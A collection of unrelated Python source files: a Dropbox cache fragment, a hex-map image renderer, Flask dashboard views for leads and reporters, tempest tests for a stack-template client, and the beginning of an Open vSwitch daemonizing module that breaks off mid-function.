    cache = cachedb.dropbox_cache.find_one({"ExternalID": serviceRecord.ExternalID})
    cache["Activities"][self._hash_path("/" + fname)] = {"Rev": metadata.rev, "UID": activity.UID, "StartTime": activity.StartTime.strftime("%H:%M:%S %d %m %Y %z"), "EndTime": activity.EndTime.strftime("%H:%M:%S %d %m %Y %z")}
    cachedb.dropbox_cache.update({"ExternalID": serviceRecord.ExternalID}, cache) # not upsert, hope the record exists at this time...
    return fpath
def DeleteCachedData(self, serviceRecord):
    """Drop all cached Dropbox activity metadata for this user."""
    cachedb.dropbox_cache.remove({"ExternalID": serviceRecord.ExternalID})
| |
"""
Map image generation classes.
"""
import math
import logging
from PIL import Image, ImageDraw
from btmux_maplib.img_generator import rgb_vals
from btmux_maplib.img_generator.exceptions import InvalidImageMode
logger = logging.getLogger(__name__)
class MuxMapImage(object):
    """
    This class serves as a base class for map image types. You generally only
    need to over-ride render_hexes() to have something that works. See
    PixelHexMapImage for an example.

    DO NOT USE THIS CLASS DIRECTLY!
    """
    # Reference to the MuxMap object to image.
    map = None
    # The PIL Image object (populated by generate_map()).
    map_img = None
    # Imaging mode, see set_mode().
    mode = "color"
    # Show some debug information.
    debug = True
    # A lowercase list of valid imaging modes.
    # color: Standard color terrain/elevation map.
    # elevmap: Elevation only, looks grayscaled aside from water.
    VALID_MODES = ["color", "elevmap"]

    def __init__(self, map):
        """
        Default init routine.

        Args:
        * map: (MuxMap) The map object to create an image of.
        """
        self.map = map

    def set_mode(self, mode):
        """
        Sets the imaging mode (case-insensitive).

        Raises:
        * InvalidImageMode if the normalized mode is not in VALID_MODES.
        """
        mode_lower = mode.lower()
        if mode_lower not in self.VALID_MODES:
            raise InvalidImageMode(mode_lower)
        else:
            self.mode = mode_lower
        logger.debug("Imaging mode set to: %s", self.mode)

    def handle_resizing(self, min_dimension, max_dimension):
        """
        Given a min and/or max dimension, calculate the overall re-size ratio
        for the image and re-size if necessary. Return the scaling multiplier
        used (1.0 when no re-size was needed).
        """
        map_width = float(self.map_img.size[0])
        map_height = float(self.map_img.size[1])
        resize_mul = 1.0
        if min_dimension is not None and \
           (map_width < min_dimension or map_height < min_dimension):
            # Determine the smallest side to bring up to our limit.
            smallest_dim = min(map_width, map_height)
            # Bicubic gives the best look when scaling up.
            resize_filter = Image.BICUBIC
            resize_mul = float(min_dimension) / smallest_dim
            logger.debug('Under-sized, re-size needed: (%d/%d) = %f',
                         min_dimension, smallest_dim, resize_mul)
            self.resize_img(resize_mul, resize_filter)
        elif max_dimension is not None and \
             (map_width > max_dimension or map_height > max_dimension):
            # Determine the largest side to bring down to our limit.
            largest_dim = max(map_width, map_height)
            # Anti-aliasing looks best when scaling down.
            resize_filter = Image.ANTIALIAS
            resize_mul = float(max_dimension) / largest_dim
            logger.debug('Over-sized, re-size needed: (%d/%d) = %f',
                         max_dimension, largest_dim, resize_mul)
            self.resize_img(resize_mul, resize_filter)
        return resize_mul

    def resize_img(self, resize_mul, resize_filter):
        """
        Re-size the map image by a float value. 1.0 = 100%.
        """
        map_width = self.map_img.size[0]
        map_height = self.map_img.size[1]
        logger.debug('Re-Size Mul: %f', resize_mul)
        logger.debug('Before Width: %d Height: %d', map_width, map_height)
        logger.debug('After Width: %d Height: %d',
                     map_width * resize_mul, map_height * resize_mul)
        # Re-size the image with the appropriate size multiplier.
        self.map_img = self.map_img.resize(
            (int(map_width * resize_mul), int(map_height * resize_mul)),
            resize_filter)

    def render_hexes(self):
        """
        Stub to alert people trying to use this class. MuxMapImage is not
        meant to be used directly, and future sub-classes need a fall-through.
        """
        raise NotImplementedError()

    def generate_map(self, min_dimension=None, max_dimension=None):
        """
        Generates a image from a map file, populates the object's map_img
        attribute with a PIL Image.

        min and max dimensions will scale the image if either the height or the
        width goes above the max or under the min size in pixels. You may
        specify one or both.
        """
        self.map_img = Image.new("RGB", self.map.get_map_dimensions())
        self.render_hexes()
        # Do any re-sizing needed.
        if min_dimension or max_dimension:
            self.handle_resizing(min_dimension, max_dimension)

    def get_terrain_rgb(self, terrain, elev):
        """
        Looks up the correct RGB value tuple for a given terrain and elevation.
        """
        # In elevmap mode everything but water ("~") is drawn with the
        # plain-terrain (".") palette, yielding a grayscale-like result.
        if self.mode == "elevmap" and terrain != "~":
            return rgb_vals.cmap["."][elev]
        return rgb_vals.cmap[terrain][elev]

    def show(self):
        """
        Following PIL convention, show() opens your OS's image viewer for
        the generated file. On Linux/Unix, this is typically xv, on Windows,
        Windows Preview thing.
        """
        self.map_img.show()

    def save(self, filename, format="PNG"):
        """
        Saves the current map file in the specified PIL-supported format.
        """
        self.map_img.save(filename, format)
class PixelHexMapImage(MuxMapImage):
    """
    Renders the map's hexes at a one hex per pixel ratio. This does not look
    very good if zoomed or scaled in very far, but is fast and more natural
    on larger maps at 100% or less scaling.
    """

    def render_hexes(self):
        """
        Over-rides the MuxMapImage stub: paint each hex as a single pixel
        colored by its terrain and elevation.
        """
        width = self.map.get_map_width()
        height = self.map.get_map_height()
        for row in range(height):
            for col in range(width):
                rgb = self.get_terrain_rgb(
                    self.map.get_hex_terrain(col, row),
                    self.map.get_hex_elevation(col, row))
                self.map_img.putpixel((col, row), rgb)
class HexMapImage(MuxMapImage):
    """
    Renders the map's hexes as hexes. This is a lot more computationally
    expensive than PixelHexMapImage, but will produce more accurate results
    when you're zoomed in.
    """
    # Lower and upper hex line length. Everything else is calculated based
    # on this number. This is best an even number.
    hex_s = 10
    # Distance between left edge and beginning of hex_s.
    hex_h = int(round(math.sin(math.radians(30)) * hex_s))
    # Distance between bounding box corners and the left and right middle bend
    # points on the hex.
    hex_r = int(round(math.cos(math.radians(30)) * hex_s))
    # Total width of the hex
    rect_b = hex_s + 2 * hex_h
    # Total height of the hex
    rect_a = 2 * hex_r
    # Color to paint the lines
    line_color = (255, 255, 255)
    # These are populated by methods and are best left alone here.
    img_width = None
    img_height = None
    draw = None

    def __init__(self, map):
        """
        Default init routine.

        Args:
        * map: (MuxMap) The map object to create an image of.
        """
        super(HexMapImage, self).__init__(map)
        # Calculate how much image area is needed to render all of the hexes.
        self.img_width = self.map.get_map_width() * (self.rect_b - self.hex_h)
        self.img_height = (self.map.get_map_height() - 1) * self.rect_a

    def generate_map(self, min_dimension=None, max_dimension=None):
        """
        Generates a image from a map file, populates the object's map_img
        attribute with a PIL Image.

        min and max dimensions will scale the image if either the height or the
        width goes above the max or under the min size in pixels. You may
        specify one or both.
        """
        self.map_img = Image.new("RGB", (self.img_width, self.img_height))
        logger.debug("Image created with dimensions: %dx%d",
                     self.map_img.size[0], self.map_img.size[1])
        self.draw = ImageDraw.Draw(self.map_img)
        self.render_hexes()
        # Do any re-sizing needed.
        if min_dimension or max_dimension:
            self.handle_resizing(min_dimension, max_dimension)

    def calc_upper_left_pixel(self, x, y):
        """
        Calculates the upper left pixel of the box used to render a hex.
        All of the hex's points are based on offsets of this point.
        """
        # If this is an odd numbered hex, off-set it by half a hex height.
        if x % 2 == 0:
            # Even numbered row
            y_pixel = (y * self.rect_a)
        else:
            # Odd numbered row
            y_pixel = (y * self.rect_a - int(round(0.5 * self.rect_a)))
        # The x-coordinate remains constaint regardless of odd or even.
        x_pixel = x * (self.rect_b - self.hex_h)
        return x_pixel, y_pixel

    def draw_hex(self, x, y, terrain, elev):
        """
        Draw the hex polygon for hex (x, y) with the given terrain/elevation.
        """
        # The upper left pixel from which the hex is based on
        upper_left = self.calc_upper_left_pixel(x, y)
        # Upper and Lower left X coordinate
        hex_s_start_x = upper_left[0] + self.hex_h
        # Upper and Lower right X coordinate
        hex_s_end_x = upper_left[0] + self.rect_b - self.hex_h
        # Lower Y coordinate
        # NOTE(review): offsets run upward (negative y) from the anchor
        # point - confirm this matches the intended orientation.
        hex_s_lower_y = upper_left[1] - self.rect_a
        # X,Y tuples for top right and left points on the hex.
        hex_uleft_xy = (hex_s_start_x, upper_left[1])
        hex_uright_xy = (hex_s_end_x, upper_left[1])
        # X,Y tuples for bottom right and left points on the hex.
        hex_lleft_xy = (hex_s_start_x, hex_s_lower_y)
        hex_lright_xy = (hex_s_end_x, hex_s_lower_y)
        # X,Y tuple for the left and right middle bend points on the hex.
        hex_left_bend_xy = (upper_left[0], upper_left[1] - self.hex_r)
        hex_right_bend_xy = (upper_left[0] + self.rect_b, upper_left[1] - self.hex_r)
        hex_point_list = [
            hex_uleft_xy, hex_uright_xy,
            hex_right_bend_xy,
            hex_lright_xy, hex_lleft_xy,
            hex_left_bend_xy
        ]
        # Draw the filled hex polygon.
        self.draw.polygon(
            hex_point_list,
            outline=self.line_color,
            fill=self.get_terrain_rgb(terrain, elev))

    def render_hexes(self):
        """
        Over-rides the MuxMapImage stub routine to draw every hex as a
        filled polygon.
        """
        # BUGFIX: the outer (row) loop must span the map's height and the
        # inner (column) loop its width; these were swapped, which broke
        # rendering of any non-square map. Compare PixelHexMapImage and
        # calc_upper_left_pixel(), which treat x as the column.
        for y in range(0, self.map.get_map_height()):
            for x in range(0, self.map.get_map_width()):
                terrain = self.map.get_hex_terrain(x, y)
                elev = self.map.get_hex_elevation(x, y)
                self.draw_hex(x, y, terrain, elev)
| |
"""Contains Classes for different View Routes
Attributes:
url_rules (list): contains url rule objects, for add_url_rules() function
"""
import flask, flask.views
import functools
import config
import json
from nltk import word_tokenize
from nltk.corpus import stopwords
from hln.user import User
from hln import app
from hln import es
def login_required(method):
    """Decorator enforcing an authenticated session on a view method.

    Anonymous visitors are flashed a notice and redirected to the login
    page; authenticated ones fall straight through to the wrapped
    get/post handler.

    Args:
        method (class bound method): get/post method of a url route class

    Returns:
        function: the wrapping function
    """
    @functools.wraps(method)
    def wrapper(*args, **kwargs):
        # Session membership is the sole login check used site-wide.
        if 'username' not in flask.session:
            flask.flash("A login is required")
            return flask.redirect(flask.url_for("login"))
        return method(*args, **kwargs)
    return wrapper
def add_url_rules(url_rules):
    """Register each route dict on the Flask app.

    Args:
        url_rules (list): rule dicts with required keys 'url', 'class',
            'view_name' and optional 'methods' (defaults to ['GET']).

    Returns:
        None
    """
    for spec in url_rules:
        # Default to GET-only routes when no methods were given.
        spec.setdefault('methods', ['GET'])
        app.add_url_rule(
            spec['url'],
            view_func=spec['class'].as_view(spec['view_name']),
            methods=spec['methods']
        )
class Home(flask.views.MethodView):
    """Dashboard landing page route ("/")."""

    @login_required
    def get(self):
        """Serve the main dashboard template to a logged-in user."""
        return flask.render_template("dashboard.html")
class Login(flask.views.MethodView):
    """Login page and credential handling route ("/login/")."""

    def get(self):
        """Show the login form, or go straight home if already signed in.

        Returns:
            redirect/render: page redirect or rendered login template
        """
        if 'username' not in flask.session:
            return flask.render_template("login.html")
        return flask.redirect(flask.url_for('home'))

    def post(self):
        """Authenticate the submitted credentials.

        Returns:
            redirect: home on success, the login form again on failure
        """
        form = flask.request.form
        credentials = {
            'username': form['email'],
            'password': form['password']
        }
        # @todo : clean and validate credentials before use
        if User(credentials).authenticate():
            flask.session['username'] = credentials['username']
            return flask.redirect(flask.url_for('home'))
        flask.flash("User Authentication Failed. Please try again.")
        return self.get()
class Logout(flask.views.MethodView):
    """Session teardown route ("/logout/")."""

    @login_required
    def get(self):
        """Drop the user's session entry and send them to the login page.

        Returns:
            redirect: page redirect to the login view
        """
        flask.session.pop('username', None)
        return flask.redirect(flask.url_for('login'))
class Leads(flask.views.MethodView):
    """Leads url route Class"""

    @login_required
    def post(self):
        """Processes the search query string using nltk and fetches the
        latest leads from the elasticsearch handler (es_handler) module.

        Returns:
            string: JSON-encoded leads docs (relevance boosted and
            filtered based on the parsed query)
        """
        count = flask.request.form.get('count') or 5
        offset = flask.request.form.get('offset') or 0
        search_query = flask.request.form.get('search_query') or ''
        if search_query:
            search_query = self.process_query(search_query)
        leads = es.get_latest_leads(search_query, count, offset)
        return json.dumps(leads)

    def process_query(self, search_query):
        """Removes stopwords, extracts categories (#tags) and entities
        (@mentions) from the raw query string.

        Args:
            search_query (string): search query string

        Returns:
            dict: parsed dictionary with 'tokens', 'categories' and
            'entities' lists (all lowercased)
        """
        res = {}
        # BUGFIX: compare case-insensitively - the nltk stopword list is
        # lowercase, so "The" must be filtered just like "the". A set also
        # makes each membership test O(1).
        stop = set(stopwords.words("english"))
        tokens = search_query.split()
        res['tokens'] = [token.lower() for token in tokens if token.lower() not in stop]
        # get #hash_tags from search query
        res['categories'] = [hash_tag.lower()[1:] for hash_tag in tokens if hash_tag[0] == "#"]
        # get @mentions from search query
        res['entities'] = [mention.lower()[1:] for mention in tokens if mention[0] == "@"]
        return res
class Reporters(flask.views.MethodView):
    """Reporters url route Class"""

    @login_required
    def post(self):
        """Look up a single reporter document in ES by id (0 when absent).

        Returns:
            string: JSON-encoded reporter document
        """
        reporter_id = flask.request.form.get('reporter_id') or 0
        return json.dumps(es.get_reporter(reporter_id))
class LeadCount(flask.views.MethodView):
    """LeadCount url route Class"""

    @login_required
    def post(self):
        """Return lead document counts, bucketed when agg_type is given.

        When agg_type is None the total document count is fetched.

        Returns:
            string: JSON-encoded document counts
        """
        agg_type = flask.request.form.get('agg_type')
        agg_size = flask.request.form.get('agg_size') or 10
        time_interval = flask.request.form.get('time_interval')
        return json.dumps(es.get_leadcount(agg_type, time_interval, agg_size))
class ReporterCount(flask.views.MethodView):
    """ReporterCount url route Class"""

    @login_required
    def post(self):
        """Return the total reporter document count from ES.

        Returns:
            string: JSON-encoded reporters count
        """
        return json.dumps(es.get_reportercount())
# Route table consumed by add_url_rules() above; entries without an
# explicit 'methods' key default to GET-only.
url_rules = [
    {'url':'/', 'class':Home, 'view_name':'home'},
    {'url':'/logout/', 'class':Logout, 'view_name':'logout'},
    {'url':'/login/', 'class':Login, 'view_name':'login', 'methods':['GET', 'POST']},
    {'url':'/lead/get/', 'class':Leads, 'view_name':'leads', 'methods':['GET', 'POST']},
    {'url':'/lead/count/get/', 'class':LeadCount, 'view_name':'leadcount', 'methods':['GET', 'POST']},
    {'url':'/reporter/get/', 'class':Reporters, 'view_name':'reporters', 'methods':['GET', 'POST']},
    {'url':'/reporter/count/get/', 'class':ReporterCount, 'view_name':'reportercount', 'methods':['GET', 'POST']}
]

# add url rules to Flask app (runs at import time)
add_url_rules(url_rules)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.scenario import manager
from tempest.test import services
from tempest.common.utils.data_utils import rand_name
import time
class FusionClientTest(manager.FusionScenarioTest):
    """Functional tests for the Fusion template/stack client.

    Each test drives self.fusion_client (bound to self.client in setUp)
    against the template catalog and the stack lifecycle endpoints.
    Note: this module is Python 2 (print statements, dict.iteritems).
    """

    def setUp(self):
        super(FusionClientTest, self).setUp()
        # Shorthand used by every test below.
        self.client = self.fusion_client

    def test_get_single_template(self):
        """A known template can be fetched and carries a description."""
        template_id="wordpress-single"
        resp = self.client.templates.get(template_id)
        resp = resp.to_dict()
        self.assertIn('description',resp,)

    def test_single_template_with_metadata(self):
        """with_metadata=True adds the rackspace-metadata section."""
        template_id="wordpress-single"
        resp = self.client.templates.get(template_id,with_metadata=True)
        resp = resp.to_dict()
        self.assertIn('rackspace-metadata',resp,)

    def test_get_template_catalog(self):
        """Every catalog entry has a description."""
        resp = self.client.templates.get_all()
        for template in resp:
            template = template.to_dict()
            self.assertIn('description', template)

    def test_get_template_catalog_with_metadata(self):
        """Every catalog entry carries metadata when requested."""
        resp = self.client.templates.get_all(with_metadata=True)
        for template in resp:
            template = template.to_dict()
            self.assertIn('rackspace-metadata', template)

    def test_get_list_of_stack(self):
        """Listed stacks expose a stack_status field."""
        stacks = self.client.stacks.list()
        for stack in stacks:
            stack = stack.__dict__
            self.assertIn('stack_status', stack)

    def test_stack_preview(self):
        """Preview resource types match the template's resource types."""
        template_id = "wordpress-single"
        region = "DFW"
        parameters={}
        stack_name = rand_name("fusion_"+template_id+region)
        resp = self.client.templates.get(template_id,with_metadata=True)
        resp = resp.to_dict()
        body = self.client.stacks.preview(
            template_id="wordpress-single",
            stack_name=stack_name,
            parameters=parameters)
        body= body.to_dict()
        # NOTE(review): leftover debug print - consider removing.
        print "test"
        response_resource_list = []
        for resource in body['resources']:
            response_resource_list.append(resource['resource_type'])
        response_resource_list.sort()
        template_resource_list = []
        resources_temp = resp['resources']
        for key, value in resources_temp.iteritems():
            resource = value['type']
            template_resource_list.append(resource)
        template_resource_list.sort()
        self.comp_list(response_resource_list,template_resource_list)

    def test_stack_preview_with_template_content(self):
        """Preview from template content also matches resource types."""
        parameters={}
        template_id="wordpress-single"
        resp = self.client.templates.get(template_id)
        resp = resp.to_dict()
        region = "DFW"
        stack_name = rand_name("fusion_"+template_id+region)
        body = self.client.stacks.preview(
            template_id="wordpress-single",
            stack_name=stack_name,
            parameters=parameters)
        body= body.to_dict()
        response_resource_list = []
        for resource in body['resources']:
            response_resource_list.append(resource['resource_type'])
        response_resource_list.sort()
        template_resource_list = []
        resources_temp = resp['resources']
        for key, value in resources_temp.iteritems():
            resource = value['type']
            template_resource_list.append(resource)
        template_resource_list.sort()
        self.comp_list(response_resource_list,template_resource_list)

    def test_create_stack_with_supported_template_id(self):
        """Stack created by template id exposes support info on request."""
        template_id = "wordpress-single"
        region = "QA"
        parameters={}
        stack_name = rand_name("fusion_"+template_id+region)
        body = self.client.stacks.create(
            template_id="wordpress-single",
            stack_name=stack_name,
            parameters=parameters)
        stack_id = "%s/%s"%(stack_name,body['stack']['id'])
        body = self.client.stacks.get(stack_id,with_support_info=True)
        body=body.to_dict()
        self.assertIn('template_id', body,)
        self.assertIn('application_name', body)
        self.assertIn('rackspace_template', body)
        # Clean up the created stack.
        self.client.stacks.delete(stack_id)

    def test_create_stack_with_supported_template_id_with_false_support_info(
            self):
        """Without with_support_info, the support fields are omitted."""
        template_id = "wordpress-single"
        region = "QA"
        parameters={}
        stack_name = rand_name("fusion_"+template_id+region)
        body = self.client.stacks.create(
            template_id="wordpress-single",
            stack_name=stack_name,
            parameters=parameters)
        stack_id = "%s/%s"%(stack_name,body['stack']['id'])
        body = self.client.stacks.get(stack_id)
        body=body.to_dict()
        self.assertNotIn('template_id', body,)
        self.assertNotIn('application_name', body)
        self.assertNotIn('rackspace_template', body)
        # Clean up the created stack.
        self.client.stacks.delete(stack_id)

    def test_create_stack_with_supported_template(self):
        """Stack created from raw template content has no template_id."""
        # Unsupported Template with flag as False
        parameters={}
        template_id="wordpress-single"
        resp = self.client.templates.get(template_id)
        resp = resp.to_dict()
        stack_name = rand_name("Fusion_")
        body = self.client.stacks.create(
            template=resp,
            stack_name=stack_name,
            parameters=parameters)
        stack_id = body['stack']['id']
        body = self.client.stacks.get(stack_id,with_support_info=True)
        body= body.to_dict()
        self.assertNotIn('template_id', body)
        self.assertIn('application_name', body)
        self.assertIn('rackspace_template', body)
        # Clean up the created stack.
        self.client.stacks.delete(stack_id)

    def test_stack_update(self):
        """A completed stack can be updated with the same template id.

        Polls create status once a minute for up to 20 minutes before
        giving up and force-deleting the stack.
        """
        template_id = "wordpress-single"
        region = "DFW"
        parameters={}
        stack_name =rand_name("fusion_shwe_"+template_id+region)
        body = self.client.stacks.create(
            template_id="wordpress-single",
            stack_name=stack_name,
            parameters=parameters)
        stack_identifier = body['stack']['id']
        stack_id = "%s/%s" % (stack_name,stack_identifier)
        body = self.client.stacks.get(stack_id)
        count = 0
        body = body.to_dict()
        while body['stack_status'] == 'CREATE_IN_PROGRESS' and count < 20:
            body = self.client.stacks.get(stack_id)
            body = body.to_dict()
            print "Deployment in %s status. Checking again in 1 minute" % \
                  body['stack_status']
            time.sleep(60)
            count += 1
        if body['stack_status'] == 'CREATE_FAILED':
            print "Stack create failed. Here's why: %s" % body['stack_status_reason']
        if count == 20:
            print "Stack create has taken over 20 minutes. Force " \
                  "failing now."
            self.client.stacks.delete(stack_id)
        if body['stack_status'] == 'CREATE_COMPLETE':
            body_update = self.client.stacks.update(stack_identifier,
                template_id=template_id,parameters=parameters)
            self.client.stacks.delete(stack_id)

    def comp_list(self ,list1, list2):
        """Print whether every element of list1 is present in list2."""
        Result = []
        for val in list1:
            if val in list2:
                Result.append(True)
            else :
                Result.append(False)
        if False in Result:
            print "Resources in template and stack_preview response are " \
                  "different"
        else:
            print"Resources in template and stack_preview response are " \
                 "same"
| |
# Copyright (c) 2010, 2011 Nicira, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import fcntl
import os
import resource
import signal
import sys
import time
import ovs.dirs
import ovs.fatal_signal
#import ovs.lockfile
import ovs.process
import ovs.socket_util
import ovs.timeval
import ovs.util
import ovs.vlog
# Module-level logger for daemonization events.
vlog = ovs.vlog.Vlog("daemon")

# --detach: Should we run in the background?
_detach = False

# --pidfile: Name of pidfile (null if none).
_pidfile = None

# Our pidfile's inode and device, if we have created one.
_pidfile_dev = None
_pidfile_ino = None

# --overwrite-pidfile: Create pidfile even if one already exists and is locked?
_overwrite_pidfile = False

# --no-chdir: Should we chdir to "/"?
_chdir = True

# --monitor: Should a supervisory process monitor the daemon and restart it if
# it dies due to an error signal?
_monitor = False

# File descriptor used by daemonize_start() and daemonize_complete().
_daemonize_fd = None

# NOTE(review): presumably the exit code a monitored daemon uses to ask its
# supervisor for a restart - confirm against the monitor loop in daemonize().
RESTART_EXIT_CODE = 5
def make_pidfile_name(name):
    """Map a user-supplied pidfile name to the path set_pidfile() would use.

    An empty or None name yields RUNDIR/<PROGRAM_NAME>.pid; anything else
    is resolved relative to RUNDIR (absolute names pass through).
    """
    if name:
        return ovs.util.abs_file_name(ovs.dirs.RUNDIR, name)
    return "%s/%s.pid" % (ovs.dirs.RUNDIR, ovs.util.PROGRAM_NAME)
def set_pidfile(name):
    """Arrange for a following daemonize() to create a pidfile from *name*.

    If 'name' begins with '/' it is treated as an absolute path; otherwise
    it is taken relative to ovs.dirs.RUNDIR ($(prefix)/var/run by default).
    A null name falls back to ovs.util.PROGRAM_NAME plus ".pid".
    """
    global _pidfile
    _pidfile = make_pidfile_name(name)
def get_pidfile():
    """Return the configured pidfile's absolute path, or None if unset."""
    return _pidfile
def set_no_chdir():
    """Disable the default chdir("/") performed while daemonizing."""
    global _chdir
    _chdir = False
def is_chdir_enabled():
    """Report whether daemonizing will chdir to "/"."""
    return _chdir
def ignore_existing_pidfile():
    """Replace (with a warning) rather than abort on a locked pidfile.

    By default daemonize()/daemonize_start() terminate the program with a
    message when a locked pidfile already exists; calling this makes an
    existing pidfile get overwritten instead.
    """
    global _overwrite_pidfile
    _overwrite_pidfile = True
def set_detach():
    """Request that a following daemonize() detach from the foreground
    session and run this process in the background."""
    global _detach
    _detach = True
def get_detach():
    """Report whether daemonize() will really detach."""
    return _detach
def set_monitor():
    """Request that a following daemonize() fork a supervisory process that
    monitors the daemon and restarts it if it dies due to an error signal."""
    global _monitor
    _monitor = True
def _fatal(msg):
    """Log *msg*, echo it to stderr, and terminate with exit status 1."""
    vlog.err(msg)
    sys.stderr.write("%s\n" % msg)
    sys.exit(1)
def _make_pidfile():
    """If a pidfile has been configured, creates it and stores the running
    process's pid in it.  Ensures that the pidfile will be deleted when the
    process exits.

    The file is created as a locked temporary and then renamed or linked
    into place, so a concurrently running daemon is detected reliably."""
    pid = os.getpid()
    # Create a temporary pidfile.
    tmpfile = "%s.tmp%d" % (_pidfile, pid)
    ovs.fatal_signal.add_file_to_unlink(tmpfile)
    try:
        # This is global to keep Python from garbage-collecting and
        # therefore closing our file after this function exits. That would
        # unlock the lock for us, and we don't want that.
        global file_handle
        file_handle = open(tmpfile, "w")
    except IOError as e:
        _fatal("%s: create failed (%s)" % (tmpfile, e.strerror))
    try:
        s = os.fstat(file_handle.fileno())
    except IOError as e:
        _fatal("%s: fstat failed (%s)" % (tmpfile, e.strerror))
    try:
        file_handle.write("%s\n" % pid)
        file_handle.flush()
    except OSError as e:
        _fatal("%s: write failed: %s" % (tmpfile, e.strerror))
    try:
        # Hold an exclusive lock for the life of the process; other
        # processes use this lock to detect a stale pidfile.
        fcntl.lockf(file_handle, fcntl.LOCK_EX | fcntl.LOCK_NB)
    except IOError as e:
        _fatal("%s: fcntl failed: %s" % (tmpfile, e.strerror))
    # Rename or link it to the correct name.
    if _overwrite_pidfile:
        try:
            os.rename(tmpfile, _pidfile)
        except OSError as e:
            _fatal("failed to rename \"%s\" to \"%s\" (%s)"
                   % (tmpfile, _pidfile, e.strerror))
    else:
        # link() fails with EEXIST when _pidfile already exists, which is
        # how another running daemon is detected.
        while True:
            try:
                os.link(tmpfile, _pidfile)
                error = 0
            except OSError as e:
                error = e.errno
            if error == errno.EEXIST:
                _check_already_running()
            elif error != errno.EINTR:
                break
        if error:
            _fatal("failed to link \"%s\" as \"%s\" (%s)"
                   % (tmpfile, _pidfile, os.strerror(error)))
    # Ensure that the pidfile will get deleted on exit.
    ovs.fatal_signal.add_file_to_unlink(_pidfile)
    # Delete the temporary pidfile if it still exists.
    if not _overwrite_pidfile:
        error = ovs.fatal_signal.unlink_file_now(tmpfile)
        if error:
            _fatal("%s: unlink failed (%s)" % (tmpfile, os.strerror(error)))
    # Remember the pidfile's identity so __read_pidfile() can recognize
    # our own pidfile later.
    global _pidfile_dev
    global _pidfile_ino
    _pidfile_dev = s.st_dev
    _pidfile_ino = s.st_ino
def daemonize():
    """Convenience wrapper that runs both halves of daemonization:
    creates the pidfile and detaches, as configured by set_pidfile()
    and set_detach()."""
    daemonize_start()
    daemonize_complete()
def _waitpid(pid, options):
    """os.waitpid() wrapper that retries when interrupted by a signal.

    Returns the (pid, status) pair from os.waitpid() on success, or
    (-errno, 0) on failure."""
    while True:
        try:
            return os.waitpid(pid, options)
        except OSError as e:
            if e.errno == errno.EINTR:
                # Interrupted by a signal: retry the wait.  (Previously
                # this fell through and returned an error, so the retry
                # loop never actually retried.)
                continue
            return -e.errno, 0
def _fork_and_wait_for_startup():
    """Forks, then makes the parent wait until the child reports startup.

    Returns the child's pid in the parent process and 0 in the child.  In
    the child, _daemonize_fd is set to the write side of a pipe; writing a
    byte to it (see _fork_notify_startup()) releases the waiting parent.
    If the child dies without writing, the parent exits with the child's
    exit status (or 1)."""
    try:
        rfd, wfd = os.pipe()
    except OSError as e:
        sys.stderr.write("pipe failed: %s\n" % os.strerror(e.errno))
        sys.exit(1)
    try:
        pid = os.fork()
    except OSError as e:
        sys.stderr.write("could not fork: %s\n" % os.strerror(e.errno))
        sys.exit(1)
    if pid > 0:
        # Running in parent process.
        os.close(wfd)
        ovs.fatal_signal.fork()
        # Block until the child writes its startup byte or dies (EOF).
        while True:
            try:
                s = os.read(rfd, 1)
                error = 0
            except OSError as e:
                s = ""
                error = e.errno
            if error != errno.EINTR:
                break
        if len(s) != 1:
            # The pipe closed without a startup byte: the child failed.
            retval, status = _waitpid(pid, 0)
            if retval == pid:
                if os.WIFEXITED(status) and os.WEXITSTATUS(status):
                    # Child exited with an error. Convey the same error to
                    # our parent process as a courtesy.
                    sys.exit(os.WEXITSTATUS(status))
                else:
                    sys.stderr.write("fork child failed to signal "
                                     "startup (%s)\n"
                                     % ovs.process.status_msg(status))
            else:
                assert retval < 0
                sys.stderr.write("waitpid failed (%s)\n"
                                 % os.strerror(-retval))
                sys.exit(1)
        os.close(rfd)
    else:
        # Running in child process.
        os.close(rfd)
        ovs.timeval.postfork()
        #ovs.lockfile.postfork()
        global _daemonize_fd
        _daemonize_fd = wfd
    return pid
def _fork_notify_startup(fd):
    """Report successful startup to the parent waiting on pipe fd 'fd'.

    A None 'fd' makes this a no-op.  Exits the process when the pipe
    write fails."""
    if fd is None:
        return
    error, bytes_written = ovs.socket_util.write_fully(fd, "0")
    if error:
        sys.stderr.write("could not write to pipe\n")
        sys.exit(1)
    os.close(fd)
def _should_restart(status):
    """Decide whether the monitor should restart a daemon whose wait
    status is 'status': yes when it exited with RESTART_EXIT_CODE or was
    killed by one of the error signals listed below."""
    if os.WIFEXITED(status) and os.WEXITSTATUS(status) == RESTART_EXIT_CODE:
        return True
    if not os.WIFSIGNALED(status):
        return False
    error_signals = ("SIGABRT", "SIGALRM", "SIGBUS", "SIGFPE", "SIGILL",
                     "SIGPIPE", "SIGSEGV", "SIGXCPU", "SIGXFSZ")
    term_sig = os.WTERMSIG(status)
    return any(term_sig == getattr(signal, name, None)
               for name in error_signals)
def _monitor_daemon(daemon_pid):
    """Monitor-process main loop: babysits the daemon 'daemon_pid'.

    Waits for the daemon to die and, when _should_restart() classifies the
    death as an error, forks a replacement (throttled to one restart per
    10 seconds).  Returns only inside the newly forked daemon process;
    otherwise it exits."""
    # XXX should log daemon's stderr output at startup time
    # XXX should use setproctitle module if available
    last_restart = None
    while True:
        retval, status = _waitpid(daemon_pid, 0)
        if retval < 0:
            sys.stderr.write("waitpid failed\n")
            sys.exit(1)
        elif retval == daemon_pid:
            status_msg = ("pid %d died, %s"
                          % (daemon_pid, ovs.process.status_msg(status)))
            if _should_restart(status):
                if os.WCOREDUMP(status):
                    # Disable further core dumps to save disk space.
                    try:
                        resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
                    except resource.error:
                        vlog.warn("failed to disable core dumps")
                # Throttle restarts to no more than once every 10 seconds.
                if (last_restart is not None and
                    ovs.timeval.msec() < last_restart + 10000):
